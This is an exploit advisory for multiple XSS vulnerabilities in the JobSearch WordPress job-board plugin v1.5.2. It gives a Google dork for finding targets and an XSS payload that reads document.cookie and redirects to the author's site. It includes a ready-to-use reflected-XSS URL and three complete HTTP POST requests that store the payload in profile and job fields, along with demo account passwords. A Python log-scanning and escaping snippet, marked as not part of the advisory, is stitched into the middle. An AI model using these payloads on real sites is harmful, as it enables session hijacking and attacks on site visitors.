[+] Exploit Title: JobSearch WP Job Board WordPress Plugin v1.5.2 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/plugins/wp-jobsearch/
[+] Date: 2020-07-05
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 1.5.2
[+] Software Link: https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An unauthenticated reflected XSS and multiple authenticated persistent XSS vulnerabilities were discovered in the JobSearch plugin v1.5.2 for WordPress.

[i] The authenticated persistent XSS on the Job Page triggers both in the dashboard area (/user-dashboard/?tab=manage-jobs) and on the job page itself.

[i] Demo account #1 (Candidate): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Demo account #2 (Employer): vladvector2 / DJKNFU#$&H#IUFD (login / password)

[i] Candidate Profile URL: https://eyecix.com/plugins/jobsearch/candidate/vladvector/

[i] Employer Profile URL: https://eyecix.com/plugins/jobsearch/employer/vladvector/

[i] Employer Job URL: https://eyecix.com/plugins/jobsearch/job/poc/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?sector_cat=[payload]

[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable field: Dial Code)

[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Dial Code, Full Address)

[x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Offered Salary, Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address)
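As an added defender-side example (not part of the advisory), the following Python flags access-log requests whose `sector_cat` value decodes to markup, and shows the attribute-escaping that neutralises the same value before it is echoed. The log lines are constructed; `html.escape` stands in for WordPress's `esc_attr()`, which the plugin would need to apply to the reflected parameter and the stored profile/job fields.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access log (not from the advisory): line 1 carries the
# advisory's URL-encoded sector_cat vector, line 2 is a benign lookup.
ACCESS_LOG = """\
203.0.113.5 - - [05/Jul/2020:10:01:12 +0000] "GET /plugins/jobsearch/?sector_cat=%22--%3E%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E1%22--%3E HTTP/1.1" 200 5120
203.0.113.9 - - [05/Jul/2020:10:02:40 +0000] "GET /plugins/jobsearch/?sector_cat=marketing HTTP/1.1" 200 4980
"""

# Common log format: client IP, then the quoted request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# Tag openers (including <!-- comment tricks), inline event handlers, javascript: URLs.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:', re.IGNORECASE)


def decode_param(value: str) -> str:
    """Percent-decode until stable so double-encoded input is not missed."""
    previous = None
    while previous != value:
        previous, value = value, unquote(value)
    return value


def looks_like_markup_injection(value: str) -> bool:
    """Heuristic check on the fully decoded value."""
    return MARKUP_RE.search(decode_param(value)) is not None


def flag_sector_cat(log_text: str) -> list:
    """Return client IPs whose sector_cat parameter looks like markup injection."""
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if any(looks_like_markup_injection(v) for v in query.get("sector_cat", [])):
            flagged.append(m["ip"])
    return flagged


def render_safely(value: str) -> str:
    """Attribute-escape before echoing; html.escape(quote=True) plays the role of esc_attr()."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    print(flag_sector_cat(ACCESS_LOG))
    print(render_safely(decode_param('%22--%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E')))
```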



### [ Payload: ]

[$] "--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://eyecix.com/plugins/jobsearch/?sector_cat=%22--%3E%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E1%22--%3E

[!] GET /plugins/jobsearch/?sector_cat=%22--%3E%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E1%22--%3E HTTP/1.1
Host: eyecix.com



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------37355866649416730132656525480
Content-Length: 4733
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_phone"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_sector"

10
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_bio"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="academic-level"

masters-degree
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="Age"

23-27-years
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="salary"

31337
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="gender"

male
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="industry"

html-department
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_address"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------37355866649416730132656525480--



### [ PoC Authenticated Persistent XSS -> Employer User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------3410078824874134106483353426
Content-Length: 4050
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="display_name"

1337
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_phone"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_website"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_sector"

10
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_dob_mm"

7
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_dob_dd"

5
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_dob_yy"

2020
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_bio"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="founded-since"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------3410078824874134106483353426--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=user-job HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------14887782671057058922257617694
Content-Length: 4157
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=user-job
Cookie: [cookies_here]

-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_detail"

PoC
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="application_deadline"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_sector"

10
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_type"

4
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="get_job_skills[]"

CSS
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_apply_url"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_apply_email"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_max_salary"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="offered-salary"

19000
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="career-level"

executive
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="experience"

4-years
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="gender"

male
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="Industry"

graphics-designing
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="qualifications"

masters-degree
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

16
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------14887782671057058922257617694--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector